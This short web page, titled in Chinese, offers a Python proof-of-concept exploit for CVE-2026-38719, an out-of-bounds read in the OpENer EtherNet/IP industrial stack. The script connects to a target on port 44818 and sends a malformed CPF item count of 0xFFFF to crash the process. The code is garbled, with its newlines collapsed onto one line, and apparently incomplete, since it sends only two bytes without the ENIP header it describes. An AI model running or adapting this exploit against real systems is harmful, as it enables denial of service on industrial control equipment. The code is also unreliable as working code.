CVE-2026-38719 OpENer越界读取漏洞

import socket import struct # PoC for CVE-2026-38719: OpENer Out-of-Bounds Read # This script sends a malformed ENIP/CPF packet with a large item_count # to trigger the vulnerability in CreateCommonPacketFormatStructure(). def send_malformed_packet(target_ip, target_port=44818): try: # Create a TCP socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((target_ip, target_port)) # ENIP Header (Simplified for demonstration) # Command: 0x0065 (Register Session) or 0x006F (SendRRData) # Length: Calculated below # Session Handle: 0x00000000 # Status: 0x00000000 # Sender Context: 0x0000000000000000 # Options: 0x00000000 # Constructing a vulnerable CPF payload # The vulnerability lies in the Item Count (2 bytes) # We set it to 0xFFFF (Max uint16) while providing minimal data # This violates the data_length check. # CPF Item Count (Vulnerable field) item_count = 0xFFFF # Assemble the payload (Simplified ENIP SendRRData structure) # Interface Handle: 0x00000000 # Timeout: 0x0000 # CPF Count: 2 (Number of CPF items - usually 2 for address/data) # CPF Item 1 Type: 0x0000 (Null Address) # CPF Item 1 Length: 0x0000 # CPF Item 2 Type: 0x00B2 (Connected Data Packet) # CPF Item 2 Length: 0x0000 # To trigger the specific bug in CreateCommonPacketFormatStructure, # we focus on the CPF header parsing where item_count is read. # Here we simulate a raw CPF structure push. payload = struct.pack(">H", item_count) # The malicious Item Count # Note: A full valid ENIP session handshake (Register Session) # is typically required before sending encapsulated data. # This payload demonstrates the specific malformed structure. s.send(payload) print(f"[+] Malformed packet sent to {target_ip}:{target_port}") print("[+] Check if the OpENer process crashed or logged an error.") s.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": # Replace with actual target IP TARGET_IP = "192.168.1.100" send_malformed_packet(TARGET_IP)